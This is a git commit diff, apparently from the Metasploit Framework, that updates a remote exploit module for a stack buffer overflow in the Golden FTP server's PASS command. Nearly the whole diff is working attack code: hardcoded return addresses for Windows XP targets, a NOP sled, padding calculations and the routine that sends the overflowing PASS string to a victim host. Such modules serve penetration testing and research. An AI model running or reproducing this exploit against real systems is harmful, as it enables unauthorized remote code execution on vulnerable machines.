Updated metadata, merged code with #4923. Thx Joff.
git-svn-id: file:///home/svn/framework3/trunk@13211 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9b72b12050
commit
821e9dd68b
|
@ -20,10 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'GoldenFTP PASS Stack Buffer Overflow',
|
'Name' => 'GoldenFTP PASS Stack Buffer Overflow',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a vulnerability in the Golden
|
This module exploits a vulnerability in the Golden FTP service, using the PASS
|
||||||
FTP service. This module uses the PASS command to trigger the overflow.
|
command to cause a stack-based buffer overflow. Please note that in order trigger
|
||||||
|
the vulnerable code, the victim machine must have the "Show new connections" setting
|
||||||
|
enabled. By default, this option is unchecked.
|
||||||
},
|
},
|
||||||
'Author' => [ 'bannedit' ],
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Craig Freyman', #Initial poc on exploit-db with iglesiasgg
|
||||||
|
'bannedit', #Initial msf module
|
||||||
|
'Joff Thyer <jsthyer[at]gmail.com>', #Improved msf version
|
||||||
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -40,20 +47,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 350,
|
'Space' => 440,
|
||||||
'BadChars' => "\x00\x0a\x0d",
|
'BadChars' => "\x00\x0a\x0d",
|
||||||
},
|
},
|
||||||
'Platform' => ['win'],
|
'Platform' => ['win'],
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[
|
[ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], #JMP ESI USER32.dll
|
||||||
'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011
|
[ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ], #JMP ESI USER32.dll
|
||||||
{
|
[ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ] #JMP ESI kernel32.dll
|
||||||
'Platform' => 'win',
|
|
||||||
'Ret' => 0x00a93ca6,
|
|
||||||
},
|
|
||||||
]
|
|
||||||
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Jan 23 2011'))
|
'DisclosureDate' => 'Jan 23 2011'))
|
||||||
end
|
end
|
||||||
|
@ -70,23 +72,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
if datastore['RHOST'].length < 15
|
shortjmp = make_nops(3) + "\xeb\x20"
|
||||||
pad = make_nops(1) * (15 - datastore['RHOST'].length)
|
nopsled = make_nops(1) * 60
|
||||||
end
|
srciplen = Rex::Socket.source_address.length
|
||||||
|
padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))
|
||||||
|
|
||||||
sploit = make_nops(4) * 38
|
sploit = nopsled
|
||||||
sploit << payload.encoded
|
sploit << payload.encoded
|
||||||
sploit << pad unless pad.nil?
|
sploit << padding
|
||||||
sploit << make_nops(1) * (528 - sploit.length)
|
|
||||||
sploit << [target.ret].pack('V')
|
sploit << [target.ret].pack('V')
|
||||||
|
|
||||||
print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||||
begin
|
|
||||||
connect
|
connect
|
||||||
send_user("anonymous")
|
send_user(datastore['FTPUSER'])
|
||||||
send_cmd(['PASS', sploit], false)
|
send_cmd(['PASS', sploit], false)
|
||||||
|
select(nil,nil,nil,2)
|
||||||
handler
|
handler
|
||||||
rescue EOFError
|
disconnect
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue